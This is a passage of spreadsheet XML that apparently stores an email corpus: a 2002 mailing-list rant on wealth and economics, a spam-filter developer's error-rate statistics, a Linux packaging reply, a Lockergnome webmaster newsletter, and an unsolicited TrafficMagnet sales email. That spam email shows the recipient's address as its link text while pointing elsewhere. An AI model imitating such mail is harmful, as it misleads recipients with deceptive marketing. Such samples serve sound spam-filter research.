</t>
  </si>
  <si>
    <t xml:space="preserve">Geege wrote a strange story:
 &gt;I know a guy who in attempting to loosen  a nut at the base of the toilet 
 &gt;tapped it with a wrench, cracked the bowl in HALF, and, to prevent a flood, 
 &gt;held the bowl together with his knees until his wife returned from work 
 &gt;quite some time later.
 The bowl doesn't hold that much water. I
 would have let it spill, and then cleaned
 it up. Even the tank only holds a gallon,
 if new, or three, if old.
 _________________________________________________________________
 MSN 8 helps eliminate e-mail viruses. Get 2 months FREE*. 
 http://join.msn.com/?page=features/virus
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Comrade Communism (was Re: Crony Capitalism (was RE: sed
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
 &gt; Most of them seem to have Ivy League educations, or are Ivy League
 &gt; dropouts suggesting to me that they weren't exactly poor to start
 &gt; with.
 Actually, if I remember correctly from discussion of the list's
 composition in Forbes about five or six years ago, the *best* way to
 get on the Forbes 400 is to have *no* college at all. Can you say
 "Bootstraps", boys and girls? I knew you could...
 [Given that an undergraduate liberal arts degree from a state school,
 like, say, mine, :-), is nothing but stuff they should have taught
 you in a government-run "high" school, you'll probably get more of
 *those* on the Forbes 400 as well as time goes on. If we ever get
 around to having a good old fashioned government-collapsing
 transfer-payment depression (an economic version of this summer's
 government-forest conflagration, caused by the same kind of
 innumeracy that not clear-cutting enough forests did out west this
 summer :-)) that should motivate more than a few erst-slackers out
 there, including me, :-), to learn to actually feed themselves.]
 The *next* category on the Forbes 400 list is someone with a
 "terminal" professional degree, like an MBA, PhD, MD, etc., from the
 best school possible.
 Why? Because, as of about 1950, the *best* way to get into Harvard,
 for instance, is to be *smart*, not rich. Don't take my word for it,
 ask their admissions office. Look at the admissions stats over the
 years for proof.
 Meritocracy, American Style, was *invented* at the Ivy League after
 World War II. Even Stanford got the hint, :-), and, of course,
 Chicago taught them all how, right? :-). Practically *nobody* who
 goes to a top-20 American institution of higher learning can actually
 afford to go there these days. Unless, of course, their parents, who
 couldn't afford to go there themselves, got terminal degrees in the
 last 40 years or so. And their kids *still* had to get the grades,
 and "biased" (by intelligence :-)), test scores, to get in.
 The bizarre irony is that almost all of those people with "terminal"
 degrees, until they actually *own* something and *hire* people, or
 learn to *make* something for a living all day on a profit and loss
 basis, persist in the practically insane belief, like life after
 death, that economics is some kind of zero sum game, that dumb people
 who don't work hard for it make all the money, and, if someone *is*
 smart, works hard, and is rich, then they stole their wealth somehow.
 BTW, none of you guys out there holding the short end of this
 rhetorical stick can blame *me* for the fact that I'm using it to
 beat you severely all over your collective head and shoulders. You
 were, apparently, too dumb to grab the right end. *I* went to
 Missouri, and *I* don't have a degree in anything actually useful,
 much less a "terminal" one, which means *I*'m broker than anyone on
 this list -- it's just that *you*, of all people, lots with
 educations far surpassing my own, should just plain know better. The
 facts speak for themselves, if you just open your eyes and *look*.
 There are no epicycles, the universe does not orbit the earth, and
 economics is not a zero-sum game. The cost of anything, including
 ignorance and destitution, is the forgone alternative, in this case,
 intelligence and effort.
 [I will, however, admit to being educated *waay* past my level of
 competence, and, by the way *you* discuss economics, so have you,
 apparently.]
 BTW, if we ever actually *had* free markets in this country,
 *including* the abolition of redistributive income and death taxes,
 all those smart people in the Forbes 400 would have *more* money, and
 there would be *more* self-made people on that list. In addition,
 most of the people who *inherited* money on the list would have
 *much* less of it, not even relatively speaking. Finally, practically
 all of that "new" money would have come from economic efficiency and
 not "stolen" from someone else, investment bubbles or not.
 That efficiency is called "progress", for those of you in The
 People's Republics of Berkeley or Cambridge. It means more and better
 stuff, cheaper, over time -- a terrible, petit-bourgeois concept
 apparently not worthy of teaching by the educational elite, or you'd
 know about it by now. In economic terms, it's also called an increase
 in general welfare, and, no, Virginia, I'm not talking about
 extorting money from someone who works, and giving it to someone who
 doesn't in order to keep them from working and they can think of some
 politician as Santa Claus come election time...
 In short, then, economics is not a zero sum game, property is not
 theft, the rich don't get rich off the backs of the poor, and
 redistributionist labor "theory" of value happy horseshit is just
 that: horseshit, happy or otherwise.
 To believe otherwise, is -- quite literally, given the time Marx
 wrote Capital and the Manifesto -- romantic nonsense.
 Cheers,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
 YYboc+IcylP5TlKL58jpwEfu
 =z877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</si>
  <si>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[Jeremy]
 &gt; The total collections are 1100 messages.  I trained with 1100/5
 &gt; messages.
 While that's not a lot of training data, I picked random subsets of my
 corpora and got much better behavior (this is rates.py output; f-p rate per
 run in left column, f-n rate in right):
 Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 220 hams &amp; 220 spams
       0.000   1.364
       0.000   0.455
       0.000   1.818
       0.000   1.364
 Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 220 hams &amp; 220 spams
       0.455   2.727
       0.455   0.455
       0.000   0.909
       0.455   2.273
 Training on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 220 hams &amp; 220 spams
       0.000   2.727
       0.455   0.909
       0.000   0.909
       0.000   1.818
 Training on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 220 hams &amp; 220 spams
       0.000   2.727
       0.000   0.909
       0.000   0.909
       0.000   1.818
 Training on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 220 hams &amp; 220 spams
       0.000   1.818
       0.000   1.364
       0.000   0.909
       0.000   2.273
 total false pos 4 0.363636363636
 total false neg 29 2.63636363636
 Another full run with another randomly chosen (but disjoint) 220 of each in
 each set was much the same.  The score distribution is also quite sharp:
 Ham distribution for all runs:
 * = 74 items
   0.00 4381 ************************************************************
   2.50    3 *
   5.00    3 *
   7.50    1 *
  10.00    0
  12.50    0
  15.00    1 *
  17.50    1 *
  20.00    1 *
  22.50    0
  25.00    0
  27.50    0
  30.00    1 *
  32.50    0
  35.00    0
  37.50    0
  40.00    1 *
  42.50    0
  45.00    0
  47.50    0
  50.00    0
  52.50    0
  55.00    0
  57.50    1 *
  60.00    0
  62.50    0
  65.00    0
  67.50    1 *
  70.00    0
  72.50    0
  75.00    0
  77.50    0
  80.00    0
  82.50    0
  85.00    0
  87.50    1 *
  90.00    0
  92.50    2 *
  95.00    0
  97.50    2 *
 Spam distribution for all runs:
 * = 73 items
   0.00   13 *
   2.50    0
   5.00    4 *
   7.50    5 *
  10.00    0
  12.50    2 *
  15.00    1 *
  17.50    1 *
  20.00    2 *
  22.50    1 *
  25.00    0
  27.50    1 *
  30.00    0
  32.50    3 *
  35.00    0
  37.50    0
  40.00    0
  42.50    0
  45.00    1 *
  47.50    3 *
  50.00   16 *
  52.50    0
  55.00    0
  57.50    0
  60.00    1 *
  62.50    0
  65.00    2 *
  67.50    1 *
  70.00    1 *
  72.50    0
  75.00    1 *
  77.50    0
  80.00    3 *
  82.50    2 *
  85.00    1 *
  87.50    2 *
  90.00    2 *
  92.50    4 *
  95.00    4 *
  97.50 4323 ************************************************************
 It's hard to say whether you need better ham or better spam, but I suspect
 better spam &lt;wink&gt;.  18 of the 30 most powerful discriminators here were
 HTML-related spam indicators; the top 10 overall were:
         '&lt;font' 266 0.99
         'content-type:text/plain' 275 0.172932
         '&lt;/body&gt;' 312 0.99
         '&lt;/html&gt;' 329 0.99
         'click' 334 0.99
         '&lt;html&gt;' 335 0.99
         'wrote:' 381 0.01
         'skip:&lt; 10' 398 0.99
         'python' 428 0.01
         'content-type:text/html' 454 0.99
 The HTML tags come from non-multipart/alternative HTML messages, from which
 HTML tags aren't stripped, and there are lots of these in my spam sets.
 That doesn't account for it, though.  If I strip HTML tags out of those too,
 the rates are only a little worse:
 raining on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 220 hams &amp; 220 spams
      0.000   1.364
      0.000   1.818
      0.455   1.818
      0.000   1.818
 raining on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 220 hams &amp; 220 spams
      0.000   1.364
      0.455   1.818
      0.455   0.909
      0.000   1.818
 raining on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 220 hams &amp; 220 spams
      0.000   2.727
      0.000   0.909
      0.909   0.909
      0.455   1.818
 raining on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 220 hams &amp; 220 spams
      0.000   1.818
      0.000   0.909
      0.455   0.909
      0.000   1.364
 raining on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 220 hams &amp; 220 spams
      0.000   2.727
      0.000   1.364
      0.455   2.273
      0.455   2.273
 otal false pos 4 0.363636363636
 otal false neg 34 3.09090909091
 The 4th-strongest discriminator *still* finds another HTML clue, though!
         'subject:Python' 164 0.01
         'money' 169 0.99
         'content-type:text/plain' 185 0.2
         'charset:us-ascii' 191 0.127273
         "i'm" 232 0.01
         'content-type:text/html' 248 0.983607
         '&amp;nbsp;' 255 0.99
         'wrote:' 372 0.01
         'python' 431 0.01
         'click' 519 0.99
 Heh.  I forgot all about &amp;nbsp;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :
 &gt; 
 &gt;     More information on that slick "gstreamer-universe" thing.
 &gt; 
 &gt;     Go to this page: http://gstreamer.net/releases/redhat
 &gt; 
 &gt;     They seem to have declared a a package called "gstreamer-universe" as
 &gt;     a collection of files.  This is brilliant; what we need to do is get
 &gt;     someone with a Gnome2-universe and we'll be set, aye?  :)
 &gt; 
 &gt;     Isn't that a cool idea?
 This is called "pseudo-packages" or "meta-packages" and Debian has been
 using them for ages. I think Mandrake also makes these kind of empty
 packages.
 Anyway, their use has been discussed here a while back, and personally
 although I do agree that they can be useful at times, I don't really like
 them. For me it's more of an ugly "hack" than anything else, and I'd
 approve completely a system that would enable to install/remove entire
 categories of software... but not if achieved by building empty packages.
 Also, you can trivially do "apt-get install &lt;metapackage&gt;", but removing
 all that it installed is a bit less trivial, and could be implemented in a
 trivial and clean fashion if using some functionality meant to do this.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</si>
  <si>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http://www.efi.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format
 --6b68a94d-e09d-4085-9e4a-425d259a6579
 Content-Type: text/html; charset=iso-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3D=
 iso-8859-1"&gt;
 &lt;!-- 2.2 --&gt; 
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D"600" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D=
 "2"&gt;Hi&lt;br&gt;
       &lt;br&gt;
       I visited &lt;a href=3D=
 "http://www.trafficmagnet.net"&gt;http://www.efi.ie&lt;/a&gt;, and 
       noticed that you're not listed on some search engines! I think we can =
 offer 
       you a service which can help you increase traffic and the number of =
 visitors 
       to your website.&lt;br&gt;
       &lt;br&gt;
       I would like to introduce you to &lt;a href=3D=
 "http://www.trafficmagnet.net"&gt;TrafficMagnet.net&lt;/a&gt;. We offer a unique =
 technology 
       that will submit your website to over 300,000 search engines and =
 directories 
       every month.&lt;br&gt;
       &lt;br&gt;
       &lt;/font&gt; 
       &lt;table width=3D"398" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" =
 align=3D"center"&gt;
         &lt;tr&gt;&lt;td&gt;&lt;a href=3D"http://www.trafficmagnet.net"&gt;&lt;img src=3D=
 "http://image10.trafficmagnet.net/image/logo.gif" width=3D"137" height=3D=
 "136" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td&gt;&lt;a href=3D"http://www.trafficmagnet.net"&gt;&lt;img src=3D=
 "http://image10.trafficmagnet.net/imagenew//SC172/003/083/gem.jpg" width=3D=
 "197" height=3D"141" border=3D"1"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td valign=3D"bottom"&gt;&lt;a href=3D"http://www.trafficmagnet.net"&gt;&lt;img =
 src=3D"http://image10.trafficmagnet.net/image/signup.gif" width=3D"62" =
 height=3D"136" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;br&gt;
       You'll be surprised by the low cost, and by how effective this website =
 promotion 
       method can be. &lt;br&gt;
       &lt;br&gt;
       To find out more about TrafficMagnet and the cost for submitting your =
 website 
       to over 300,000 search engines and directories, visit &lt;a href=3D=
 "http://www.trafficmagnet.net"&gt;www.TrafficMagnet.net&lt;/a&gt;. 
       &lt;br&gt;
       &lt;br&gt;
       I would love to hear from you. &lt;br&gt;
       &lt;br&gt;&lt;br&gt;
       Best Regards,&lt;br&gt;&lt;br&gt;
       Christine Hall &lt;br&gt;
       Sales and Marketing &lt;br&gt;
       E-mail: christine@trafficmagnet.net &lt;br&gt;
       &lt;a href=3D=
 "http://www.trafficmagnet.net"&gt;http://www.TrafficMagnet.net&lt;/a&gt; 
       &lt;/font&gt; &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --6b68a94d-e09d-4085-9e4a-425d259a6579--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Webmaster Weekly]  Compatible Whistles
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/webmaster/20020712.html"&gt;
       http://www.lockergnome.com/issues/webmaster/20020712.html
       &lt;/a&gt;
       To unsubscribe, please e-mail the following address:
       leave-lgweb-2534373J@sprocket.lockergnome.com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#14367A }
  a:link    { COLOR: #008000; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #003E00; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: #000000; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #FF9700; BORDER-BOTTOM: #E08A00 4px solid; BORDER-LEFT: #FFB03F 4px solid; BORDER-RIGHT: #E08A00 4px solid; BORDER-TOP: #FFB03F 4px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #FF9700; TEXT-ALIGN: center; BORDER-BOTTOM: #E08A00 3px solid; BORDER-LEFT: #FFB03F 3px solid; BORDER-RIGHT: #E08A00 3px solid; BORDER-TOP: #FFB03F 3px solid; COLOR: #4C2E00; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold } 
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;
 &lt;title&gt;20020712 Sausage Sizzler - Lockergnome - Webmaster Weekly&lt;/title&gt;&lt;/head&gt;
 &lt;body   MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"   style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#4C2E00" alink="#000000" link="#008000" vlink="#003E00"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://images.lockergnome.com/images/back.top-r1.gif"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href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt468x60.gif" width="468" height="60" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- WebREPORT --&gt;
 &lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp;07.12.2002 WebREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;CUT YOUR DESIGN COSTS AND TIME:&lt;/b&gt; Get access to 250+ Web Templates 
 with CSS at &lt;a href="http://www.basictemplates.com/"&gt;BasicTemplates.com&lt;/a&gt;. 
 Annual memberships are only $54.95. Individual templates are $5.00 each. 
 New templates added weekly. No link back is required, and web designers 
 are not charged higher fees to use them on their clients' sites. 
 &lt;a href="http://www.basictemplates.com/tour/IFPro/scripts/imageFolio.cgi"&gt;Browse the full gallery&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Somehow, it never got mentioned that Lockergnome has a GnomeTome for all 
 you 
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;Dreamweaver users&lt;/a&gt; out there. Dennis Jarrett, a gnomie from the UK 
 with a prolific list of writing accomplishments, lent his brain to a list 
 of things everyone should know to make using Dreamweaver 4 (and newer) 
 easier to use. I 've never actually used version 4, having stuck with 3 
 until recently starting the review process of the StudioMX  suite, but 
 I've been  able to apply every tip I tried to some aspect of DreamweaverMX, 
 so I can only guess those of you using 4 will want to 
 &lt;a href="http://www.gnometomes.com/tome/001691.html"&gt;check 'em out too&lt;/a&gt;.
 &lt;p&gt;
 As I mentioned in yesterday's Digital Media newsletter, I recently 
 switched cell phones to the 
 &lt;a href="http://www.kyocera-wireless.com/kysmart/kysmart_series.htm"&gt;Kyocera QCP6035&lt;/a&gt;. 
 The unit is Palm powered, with a screen the size of an m105 and all the 
 functionality of Palm OS, in addition to having the latest bells and whistles 
 you'd want in a phone. Built in Web browsing, by way of MSN, is slightly 
 cumbersome compared to what I'm used to from my cable connection, but I can 
 already see the usefulness in carrying around portable access to things like 
 driving directions. 
 &lt;p&gt;
 Now that I've got a way to test the final results in real time, I've got a 
 more vested interest in making Lockergnome considerably more WAP compatible. 
 I'm still figuring out many of the phone's features, so that's still going to 
 be at least  a few weeks away. Without a doubt, I'll be sharing my experiences 
 in WAPing Lockergnome in an upcoming series of articles.
 &lt;p align="right"&gt;&lt;font style="font-size: 22pt" face="Jake Ludington, Chris Pirillo, Comic Sans MS" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;
 &lt;!-- MAIL --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeMAIL&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;phpMyNewsletter&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://gregory.kokanosky.free.fr/phpmynewsletter/"&gt;http://gregory.kokanosky.free.fr/phpmynewsletter/&lt;/a&gt;&lt;p&gt;
 As a free solution for managing newsletters, for smaller lists, 
 this does most of what you need. Subscribers are stored in a 
 mySQL database, with the ability to send user confirmation 
 e-mails. Initially, the address must still be added manually to 
 the database, which isn't idea, but doing this generates a 
 confirmation e-mail with a link that users click on if they want 
 to be added. The software purges addresses with no response, 
 following an administrator defined waiting period. From the php 
 interface you can send either text or HTML formatted messages, 
 with a built-in preview to make sure your formatting is OK. 
 Documentation is somewhat sparse, so prior knowledge of php and 
 mySQL are useful in getting this installed.
 &lt;br&gt;&lt;br&gt;
 &lt;!-- TOOLS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTOOLS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="right" cellpadding="0" cellspacing="8" border="0" valign="top"&gt;&lt;tr&gt;&lt;td align="center"&gt;
 &lt;a target="_blank" href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt193x60.gif" width="193" height="60" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;OpalisRobot v4.0 [60MB] NT/W2k/XP&lt;/b&gt;&lt;p&gt;
 &lt;a href="http://www.opalis.com"&gt;http://www.opalis.com&lt;/a&gt;&lt;p&gt;
 Think of this as something like "cron for Windows" only even more powerful. 
 OpalisRobot allows you to schedule almost any process on your server, 
 adding an additional layer of functionality, like the ability to program 
 telephony commands to complete administrative tasks. OpalisRobot 
 effectively processes e-mail commands, in addition to telephone DTMF tones, 
 making everything on your server administerable from remote locations, 
 even when you can't get remote control access of the machine. Programming 
 jobs is point-click simple, saving you time even when you schedule tasks 
 to save you time. If you operate in a Windows server environment, you're 
 adding extra hours to your day and costing your company additional dollars 
 by not having this software.
 &lt;!-- SERVER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSERVER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;PNG Files Do Not Show Transparency in Internet Explorer (Q294714)&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714&lt;/a&gt;&lt;p&gt;
 "If you browse to a Web page that contains an image that has a transparent 
 background in Portable Network Graphics (PNG) format, the image background 
 may appear to be gray rather than transparent."
 Fortunately, Microsoft explains a solution for this problem. Personally, I 
 haven't encountered this PNG display error, but for those of you 
 simplementing PNGs on your sites, you'll want to review the solution.
 &lt;!-- Middle Ad --&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WEB TEMPLATES WITH CSS:&lt;/b&gt; Cut your design costs and time with an 
 annual membership from &lt;a href="http://www.basictemplates.com/"&gt;BasicTemplates.com&lt;/a&gt;. 
 For only $54.95 get access to 250+ Web Templates. 
 &lt;a href="http://www.basictemplates.com/"&gt;New templates added weekly&lt;/a&gt;.  
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- USABILITY --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeUSABILITY&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://diveintomark.org/"&gt;http://diveintomark.org/&lt;/a&gt;&lt;p&gt;
 Not only is this information great for improving blog accessibility, it 
 happens to be equally relevant for *any* site. The 30 days are nearing 
 their end, which means you won't have to wait to find out what's next; 
 you can simply click to the next page. Mark Pilgrim, the site's creator, 
 sets the stage with 5 characters (all of which could easily represent 
 real people) and walks through their physical, mental, and technological 
 limitations. Following the character introductions, Mark walks through 
 an accessibility scenario each day and then relates the concept back 
 specific benefits for each character's limitations. Solutions are 
 presented with blogs in mind, but with very little extrapolation you'll 
 be able to make every site you design more user friendly.
 &lt;!-- BLOG --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeBLOG&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Backend.UserLand.Com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://backend.userland.com/"&gt;http://backend.userland.com/&lt;/a&gt;&lt;p&gt;
 I've been using Radio from the moment I finally got around to creating 
 a blog. The software keeps things simple and automatically updates 
 itself when new things get added. Userland goes far beyond creating a 
 desktop interface for their blogging system though. They've fully 
 documented all the XML, XML-RPC, and SOAP tie-ins used to connect to 
 their network, which could easily be adapted to other content 
 management applications with some XML knowhow. Backend is the place to 
 look "under the hood" at Userland's XML inner workings, including 
 detailed documentation on making everything work. If you've got 
 modifications or improvements to the system, they have an open 
 discussion forum for trading ideas.
 &lt;p align="center"&gt;&lt;p align="center"&gt;&lt;a target="_blank" href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt234x60.gif" width="234" height="60" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/webmasterweekly/20020712.html"&gt;http://www.lockergnome.com/issues/webmasterweekly/20020712.html&lt;/a&gt;&lt;br&gt;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 align="center"&gt;&lt;a target="_blank" href="http://www.basictemplates.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/bt88x31.gif" width="88" height="31" alt="Web Templates with CSS" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a HREF="http://lockergnome.pricegrabber.com/"&gt;Low Price Search&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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href="mailto:jake@lockergnome.com?subject=Webmaster Weekly"&gt;E-mail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 bgcolor="#B6EB8F"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;CREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &amp;copy;2002, Sausage Software and Lockergnome LLC. All Rights Reserved. Nathan Allan, the Sausage Crew and Lockergnome Lunatics spin all the content. Please read our &lt;a href="http://www.lockergnome.com/terms.html"&gt;Terms of Service&lt;/a&gt;.
 &lt;!-- FUNNY COMMENT    --&gt;
 &lt;/font&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://www.lockergnome.com/images/blank.gif"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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&lt;table cellpadding="5" cellspacing="1" border="0"&gt;&lt;tr&gt;&lt;td title="Click These Links to find your DREAM JOB!"&gt;&lt;font style="font-size: 8pt; font-family: Verdana"&gt;
 &lt;center&gt;&lt;b&gt;GETTING PAID WHAT YOU ARE WORTH?&lt;/b&gt;&lt;p&gt; Change your career - or get a better one! Your &lt;a href="http://www.lockergnome.com/jobs.html"&gt;dream job&lt;/a&gt; could be a mouse click away. Visit our &lt;a href="http://www.lockergnome.com/jobs.html"&gt;job search&lt;/a&gt; page for a position with a future.&lt;p&gt; &lt;a href="http://www.lockergnome.com/jobs.html"&gt;Find a new career&lt;/a&gt; today!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ben wrote :
 &gt; I use a mostly Red Hat 8.0 system, but prefer to configure and build my 
